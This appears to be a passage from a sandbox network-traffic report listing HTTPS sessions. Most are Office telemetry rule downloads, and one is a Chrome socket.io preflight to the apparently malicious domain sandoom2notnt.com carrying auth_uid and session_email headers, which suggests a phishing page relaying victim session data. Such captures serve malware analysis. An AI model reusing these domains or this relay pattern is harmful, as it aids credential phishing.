                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                              ETag: "0x8DC582BE3E55B6E"
                                                                              x-ms-request-id: 7edb8da2-f01e-0099-33f3-249171000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064941Z-15b8d89586frzkk2umu6w8qnt80000000h900000000003th
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:41 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              107192.168.2.44986313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:41 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:41 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:41 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1393
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                              ETag: "0x8DC582BE39DFC9B"
                                                                              x-ms-request-id: 0243abe0-001e-0028-29fb-25c49f000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064941Z-15b8d89586fmhkw429ba5n22m8000000033g000000001r8t
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:41 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              108192.168.2.44986213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:41 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:41 UTC591INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:41 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1356
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                              ETag: "0x8DC582BDC681E17"
                                                                              x-ms-request-id: b5ff136b-401e-005b-7aea-269c0c000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064941Z-r197bdfb6b46kmj4701qkq602400000000ug0000000001ba
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L2_T2
                                                                              X-Cache: TCP_REMOTE_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:41 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              109192.168.2.44986413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:41 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:41 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:41 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1356
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                              ETag: "0x8DC582BDF66E42D"
                                                                              x-ms-request-id: 55d9b643-201e-003f-330b-226d94000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064941Z-16849878b78qg9mlz11wgn0wcc000000018g000000007c36
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:41 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              110192.168.2.44986613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:41 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:41 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:41 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1395
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                              ETag: "0x8DC582BE017CAD3"
                                                                              x-ms-request-id: 90c23955-201e-0096-7520-26ace6000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064941Z-r197bdfb6b4gx6v9pg74w9f47s00000003h0000000003b8p
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:41 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              111192.168.2.44986713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:41 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:41 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:41 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1358
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                              ETag: "0x8DC582BE6431446"
                                                                              x-ms-request-id: e6296ddc-301e-0052-0828-2665d6000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064941Z-r197bdfb6b4hdk8h12qtxfwscn000000029g000000005qde
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:41 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              112192.168.2.44986913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:41 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:42 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:42 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1395
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                              ETag: "0x8DC582BDE12A98D"
                                                                              x-ms-request-id: eb17c832-b01e-0097-1249-274f33000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064942Z-16849878b785dznd7xpawq9gcn00000003200000000076sp
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:42 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              113192.168.2.449868188.114.97.34435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:42 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PB7bdZX HTTP/1.1
                                                                              Host: sandoom2notnt.com
                                                                              Connection: keep-alive
                                                                              Accept: */*
                                                                              Access-Control-Request-Method: GET
                                                                              Access-Control-Request-Headers: auth_uid,session_email
                                                                              Origin: https://rieg.riegriegrieg.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:49:42 UTC913INHTTP/1.1 204 No Content
                                                                              Date: Sat, 26 Oct 2024 06:49:42 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                              Vary: Access-Control-Request-Headers
                                                                              Access-Control-Allow-Headers: auth_uid,session_email
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16K%2Fg6Q23gx%2F8GDxjgv7Pf9OmZbufyudglpHdtKHS9GGLG0GNGWGCLpKCgcEJVJTIx6DsADz0u1PnEcMQH9pFL7E5rBSG034Ox5vg0d2J1OJFW0mmQKfJpxLQ%2FTn1dN7dSFxtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d8882066adca015-AMS
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=122909&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1145&delivery_rate=23545&cwnd=32&unsent_bytes=0&cid=6ac424100e489bef&ts=519&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              114192.168.2.44987013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:42 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:42 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:42 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1358
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                              ETag: "0x8DC582BE022ECC5"
                                                                              x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064942Z-16849878b78z5q7jpbgf6e9mcw0000000afg000000005c67
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:42 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              115192.168.2.44987113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:42 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:42 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:42 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1389
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                              ETag: "0x8DC582BE10A6BC1"
                                                                              x-ms-request-id: 9bc6d014-801e-008f-4946-262c5d000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064942Z-17c5cb586f6zrq5bnguxgu7frc00000002fg00000000223d
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:42 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              116192.168.2.44987213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:42 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:42 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:42 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1352
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                              ETag: "0x8DC582BE9DEEE28"
                                                                              x-ms-request-id: 75b99f9f-001e-0079-56b6-2612e8000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064942Z-r197bdfb6b48pl4k4a912hk2g400000000y0000000000hgq
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
